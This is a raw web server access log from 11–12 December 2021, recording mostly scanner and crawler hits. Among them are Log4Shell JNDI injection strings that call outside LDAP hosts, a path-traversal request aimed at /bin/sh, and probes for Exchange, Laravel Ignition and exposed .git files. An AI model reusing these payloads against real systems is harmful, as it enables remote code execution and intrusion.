[11/Dec/2021:01:09:14 +0100] 207.46.13.127 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[11/Dec/2021:01:45:09 +0100] 34.213.129.24 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[11/Dec/2021:01:45:31 +0100] 50.112.234.243 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 302
[11/Dec/2021:01:46:34 +0100] 45.155.205.233 TLSv1.2 AES256-SHA "GET /_ignition/execute-solution HTTP/1.1" 319
[11/Dec/2021:01:51:43 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[11/Dec/2021:01:51:43 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1" 925
[11/Dec/2021:01:51:43 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /1jQp HTTP/1.1" 387
[11/Dec/2021:01:51:43 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[11/Dec/2021:01:51:43 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 424
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /scripts/WPnBr.dll HTTP/1.1" 400
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /CSS/Miniweb.css HTTP/1.1" 398
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /index.aspx HTTP/1.1" 393
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /Portal/Portal.mwsl HTTP/1.1" 401
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /Portal0000.htm HTTP/1.1" 397
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /sdk HTTP/1.1" 386
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /nmaplowercheck1639183903 HTTP/1.1" 407
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 394
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.git/HEAD HTTP/1.1" 392
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[11/Dec/2021:01:51:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 424
[11/Dec/2021:01:51:45 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /main.jhtml HTTP/1.1" 393
[11/Dec/2021:01:51:45 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /docs/cplugError.html/ HTTP/1.1" 404
[11/Dec/2021:01:51:45 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "HEAD / HTTP/1.1" -
[11/Dec/2021:01:51:45 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /__Additional HTTP/1.1" 395
[11/Dec/2021:01:51:46 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /server-status HTTP/1.1" 396
[11/Dec/2021:01:51:46 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /pools HTTP/1.1" 388
[11/Dec/2021:01:51:47 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[11/Dec/2021:01:51:54 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[11/Dec/2021:01:51:55 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[11/Dec/2021:02:36:19 +0100] 107.189.31.26 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[11/Dec/2021:02:36:28 +0100] 185.107.47.171 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 309
[11/Dec/2021:02:41:55 +0100] 45.155.205.233 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[11/Dec/2021:03:14:57 +0100] 34.77.162.13 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377
[11/Dec/2021:03:22:39 +0100] 34.96.130.10 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 393
[11/Dec/2021:03:32:31 +0100] 34.86.35.18 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 391
[11/Dec/2021:03:38:17 +0100] 192.241.213.252 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[11/Dec/2021:04:11:16 +0100] 192.241.199.143 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[11/Dec/2021:04:22:50 +0100] 45.155.205.233 TLSv1.2 AES256-SHA "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 293
[11/Dec/2021:04:26:26 +0100] 20.74.166.164 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[11/Dec/2021:04:52:06 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[11/Dec/2021:05:16:44 +0100] 128.14.134.134 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[11/Dec/2021:05:55:15 +0100] 167.71.13.196 TLSv1.2 AES256-SHA "GET /$%7Bjndi:ldaps://47ab8b9f.probe001.log4j.leakix.net:1266/b%7D?${jndi:ldaps://47ab8b9f.probe001.log4j.leakix.net:1266/b}=${jndi:ldaps://47ab8b9f.probe001.log4j.leakix.net:1266/b} HTTP/1.1" 357
[11/Dec/2021:07:38:53 +0100] 185.180.143.138 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[11/Dec/2021:07:56:01 +0100] 141.98.83.139 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /owa/auth.owa HTTP/1.1" 395
[11/Dec/2021:10:46:03 +0100] 207.46.13.127 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[11/Dec/2021:12:19:50 +0100] 192.241.213.87 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[11/Dec/2021:13:27:27 +0100] 109.248.6.239 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /api/blog/5e09fe7d-84f5-4630-90c6-c0a838627227 HTTP/1.0" 433
[11/Dec/2021:15:27:55 +0100] 193.118.53.210 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[11/Dec/2021:17:46:49 +0100] 192.241.212.113 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[11/Dec/2021:18:31:06 +0100] 138.197.106.234 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[11/Dec/2021:20:08:45 +0100] 138.197.106.234 TLSv1.2 AES256-SHA "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 353
[11/Dec/2021:20:56:59 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[11/Dec/2021:20:57:10 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[11/Dec/2021:20:57:11 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[11/Dec/2021:20:57:12 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[11/Dec/2021:20:57:15 +0100] 66.240.192.138 TLSv1.2 AES256-SHA "quit" 379
[11/Dec/2021:20:57:20 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393
[11/Dec/2021:20:57:21 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394
[11/Dec/2021:20:57:22 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407
[11/Dec/2021:20:57:24 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309
[11/Dec/2021:20:57:28 +0100] 66.240.192.138 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[11/Dec/2021:22:06:56 +0100] 192.241.211.160 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[11/Dec/2021:22:08:37 +0100] 198.199.95.200 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[11/Dec/2021:22:10:17 +0100] 192.241.213.113 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[11/Dec/2021:22:12:27 +0100] 34.221.247.28 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[11/Dec/2021:22:13:19 +0100] 54.187.137.61 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 314
[11/Dec/2021:22:13:25 +0100] 54.187.137.61 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[11/Dec/2021:23:19:20 +0100] 207.46.13.237 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 311
[11/Dec/2021:23:19:22 +0100] 207.46.13.237 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 311
[11/Dec/2021:23:19:25 +0100] 207.46.13.127 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[12/Dec/2021:00:28:17 +0100] 18.237.52.164 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 306
[12/Dec/2021:00:29:03 +0100] 35.88.135.159 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 313
[12/Dec/2021:00:29:05 +0100] 35.88.135.159 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 306